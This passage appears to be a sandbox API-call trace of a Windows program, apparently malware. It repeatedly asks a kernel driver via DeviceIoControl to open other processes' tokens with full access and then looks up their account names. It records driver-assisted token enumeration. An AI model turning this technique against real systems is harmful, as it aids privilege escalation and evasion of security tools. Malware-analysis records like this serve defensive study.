[3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.452] CloseHandle (hObject=0xc0) returned 1 [0185.452] CloseHandle (hObject=0xc4) returned 1 [0185.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x904) returned 0xc4 [0185.452] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.452] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020a5b30, HandleInformation=0x0) returned 0x0 [0185.452] ObOpenObjectByPointer (in: Object=0xfffffa80020a5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.453] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x14 [0185.453] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.453] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.453] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.453] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.453] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.455] CloseHandle (hObject=0xc0) returned 1 [0185.455] CloseHandle (hObject=0xc4) returned 1 [0185.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x914) returned 0xc4 [0185.455] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.455] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020c8b30, HandleInformation=0x0) returned 0x0 [0185.455] ObOpenObjectByPointer (in: Object=0xfffffa80020c8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.455] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x14 [0185.455] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.455] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.455] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.456] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.456] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.458] CloseHandle (hObject=0xc0) returned 1 [0185.458] CloseHandle (hObject=0xc4) returned 1 [0185.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xc4 [0185.458] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.458] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020d37a0, HandleInformation=0x0) returned 0x0 [0185.458] ObOpenObjectByPointer (in: Object=0xfffffa80020d37a0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.458] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x14 [0185.458] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.458] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.458] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.458] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.458] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.460] CloseHandle (hObject=0xc0) returned 1 [0185.460] CloseHandle (hObject=0xc4) returned 1 [0185.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x934) returned 0xc4 [0185.461] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.461] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020d7b30, HandleInformation=0x0) returned 0x0 [0185.461] ObOpenObjectByPointer (in: Object=0xfffffa80020d7b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.461] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x14 [0185.461] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.461] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.461] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.461] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.461] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.463] CloseHandle (hObject=0xc0) returned 1 [0185.464] CloseHandle (hObject=0xc4) returned 1 [0185.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x944) returned 0xc4 [0185.464] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.464] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020fc740, HandleInformation=0x0) returned 0x0 [0185.464] ObOpenObjectByPointer (in: Object=0xfffffa80020fc740, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.464] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x14 [0185.464] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.464] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.464] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.464] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.464] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.467] CloseHandle (hObject=0xc0) returned 1 [0185.467] CloseHandle (hObject=0xc4) returned 1 [0185.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xc4 [0185.467] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.467] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002108790, HandleInformation=0x0) returned 0x0 [0185.467] ObOpenObjectByPointer (in: Object=0xfffffa8002108790, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.467] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x14 [0185.467] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.467] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.467] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.467] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.467] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.469] CloseHandle (hObject=0xc0) returned 1 [0185.469] CloseHandle (hObject=0xc4) returned 1 [0185.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x964) returned 0xc4 [0185.469] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.469] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002119b30, HandleInformation=0x0) returned 0x0 [0185.469] ObOpenObjectByPointer (in: Object=0xfffffa8002119b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.469] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x14 [0185.469] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.469] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.470] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.470] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.470] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.471] CloseHandle (hObject=0xc0) returned 1 [0185.471] CloseHandle (hObject=0xc4) returned 1 [0185.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x974) returned 0xc4 [0185.471] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.471] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002123060, HandleInformation=0x0) returned 0x0 [0185.471] ObOpenObjectByPointer (in: Object=0xfffffa8002123060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.472] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x14 [0185.472] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.472] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.472] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.472] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.472] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.473] CloseHandle (hObject=0xc0) returned 1 [0185.473] CloseHandle (hObject=0xc4) returned 1 [0185.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x984) returned 0xc4 [0185.474] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.474] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002133b30, HandleInformation=0x0) returned 0x0 [0185.474] ObOpenObjectByPointer (in: Object=0xfffffa8002133b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.474] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x14 [0185.474] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.474] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.474] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.474] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.474] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.476] CloseHandle (hObject=0xc0) returned 1 [0185.476] CloseHandle (hObject=0xc4) returned 1 [0185.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x994) returned 0xc4 [0185.476] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.476] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80021395d0, HandleInformation=0x0) returned 0x0 [0185.476] ObOpenObjectByPointer (in: Object=0xfffffa80021395d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.476] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x14 [0185.476] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.476] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.476] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.476] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.476] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.478] CloseHandle (hObject=0xc0) returned 1 [0185.478] CloseHandle (hObject=0xc4) returned 1 [0185.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a4) returned 0xc4 [0185.478] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.479] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002148b30, HandleInformation=0x0) returned 0x0 [0185.479] ObOpenObjectByPointer (in: Object=0xfffffa8002148b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.479] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x14 [0185.479] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.479] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.479] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.479] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.479] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.481] CloseHandle (hObject=0xc0) returned 1 [0185.481] CloseHandle (hObject=0xc4) returned 1 [0185.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b4) returned 0xc4 [0185.481] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.481] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002155060, HandleInformation=0x0) returned 0x0 [0185.481] ObOpenObjectByPointer (in: Object=0xfffffa8002155060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.481] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x14 [0185.481] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.481] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.482] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.482] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, 